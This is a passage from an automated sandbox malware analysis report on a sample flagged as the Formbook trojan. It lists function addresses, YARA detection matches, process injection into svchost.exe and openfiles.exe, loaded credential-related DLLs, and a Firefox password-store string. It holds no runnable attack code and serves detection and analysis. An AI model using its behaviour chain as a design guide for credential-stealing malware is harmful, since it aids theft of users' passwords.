            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD22_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD52_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0344E3444_2_0344E344
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0344E2004_2_0344E200
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_034501804_2_03450180
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0345674B4_2_0345674B
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0344FF574_2_0344FF57
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_034567504_2_03456750
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0344FF604_2_0344FF60
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeCode function: 4_2_0346D4204_2_0346D420
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045724465_2_04572446
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045644205_2_04564420
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0456E4F65_2_0456E4F6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C05355_2_044C0535
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045805915_2_04580591
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DC6E05_2_044DC6E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044E47505_2_044E4750
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C07705_2_044C0770
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044BC7C05_2_044BC7C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045520005_2_04552000
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045481585_2_04548158
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044B01005_2_044B0100
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0455A1185_2_0455A118
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045781CC5_2_045781CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045801AA5_2_045801AA
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045741A25_2_045741A2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045602745_2_04560274
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045402C05_2_045402C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457A3525_2_0457A352
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044CE3F05_2_044CE3F0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045803E65_2_045803E6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C0C005_2_044C0C00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044B0CF25_2_044B0CF2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04560CB55_2_04560CB5
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0455CD1F5_2_0455CD1F
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044CAD005_2_044CAD00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044BADE05_2_044BADE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044D8DBF5_2_044D8DBF
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C0E595_2_044C0E59
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457EE265_2_0457EE26
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457EEDB5_2_0457EEDB
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457CE935_2_0457CE93
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044D2E905_2_044D2E90
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04534F405_2_04534F40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04562F305_2_04562F30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04502F285_2_04502F28
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044E0F305_2_044E0F30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044B2FC85_2_044B2FC8
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044CCFE05_2_044CCFE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0453EFA05_2_0453EFA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044CA8405_2_044CA840
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C28405_2_044C2840
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044EE8F05_2_044EE8F0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044A68B85_2_044A68B8
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044D69625_2_044D6962
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C29A05_2_044C29A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0458A9A65_2_0458A9A6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044BEA805_2_044BEA80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457AB405_2_0457AB40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04576BD75_2_04576BD7
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044B14605_2_044B1460
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457F43F5_2_0457F43F
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045775715_2_04577571
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045895C35_2_045895C3
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0455D5B05_2_0455D5B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045056305_2_04505630
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045716CC5_2_045716CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457F7B05_2_0457F7B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C70C05_2_044C70C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0456F0CC5_2_0456F0CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457F0E05_2_0457F0E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045770E95_2_045770E9
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F516C5_2_044F516C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0458B16B5_2_0458B16B
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044AF1725_2_044AF172
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044CB1B05_2_044CB1B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DB2C05_2_044DB2C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045612ED5_2_045612ED
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C52A05_2_044C52A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044AD34C5_2_044AD34C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457132D5_2_0457132D
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0450739A5_2_0450739A
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04539C325_2_04539C32
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FCF25_2_0457FCF2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C3D405_2_044C3D40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04571D5A5_2_04571D5A
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04577D735_2_04577D73
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DFDC05_2_044DFDC0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C9EB05_2_044C9EB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FF095_2_0457FF09
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04483FD25_2_04483FD2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04483FD55_2_04483FD5
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C1F925_2_044C1F92
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FFB15_2_0457FFB1
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0452D8005_2_0452D800
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C38E05_2_044C38E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C99505_2_044C9950
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DB9505_2_044DB950
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045559105_2_04555910
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04577A465_2_04577A46
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FA495_2_0457FA49
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04533A6C5_2_04533A6C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0456DAC65_2_0456DAC6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04505AA05_2_04505AA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04561AA35_2_04561AA3
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0455DAAC5_2_0455DAAC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FB765_2_0457FB76
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04535BF05_2_04535BF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044FDBF95_2_044FDBF9
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DFB805_2_044DFB80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_001431305_2_00143130
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013E2F75_2_0013E2F7
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013E3005_2_0013E300
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013E5205_2_0013E520
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013C5A05_2_0013C5A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013C6E45_2_0013C6E4
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00144AF05_2_00144AF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00144AEB5_2_00144AEB
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0015B7C05_2_0015B7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: String function: 001A0D27 appears 70 times
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: String function: 00187F41 appears 35 times
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: String function: 001A8B40 appears 42 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 04507E54 appears 111 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 044AB970 appears 280 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 044F5130 appears 58 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0453F290 appears 105 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0452EA12 appears 86 times
            Source: F2024-202202.exe, 00000000.00000003.2014549447.000000000400D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs F2024-202202.exe
            Source: F2024-202202.exe, 00000000.00000003.2013038291.0000000003E63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs F2024-202202.exe
            Source: F2024-202202.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@5/3
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EA2D5 GetLastError,FormatMessageW,0_2_001EA2D5
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001D8713 AdjustTokenPrivileges,CloseHandle,0_2_001D8713
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001D8CC3
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001EB59E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_001FF121
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_001EC602
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00184FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00184FE9
            Source: C:\Users\user\Desktop\F2024-202202.exeFile created: C:\Users\user\AppData\Local\Temp\aut3BCF.tmpJump to behavior
            Source: F2024-202202.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: openfiles.exe, 00000005.00000002.3253131424.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.00000000027D0000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2574212142.00000000027D0000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2576028559.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2574088010.00000000027AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknownProcess created: C:\Users\user\Desktop\F2024-202202.exe "C:\Users\user\Desktop\F2024-202202.exe"
            Source: C:\Users\user\Desktop\F2024-202202.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F2024-202202.exe"
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
            Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\F2024-202202.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F2024-202202.exe"Jump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeSection loaded: wininet.dllJump to behavior
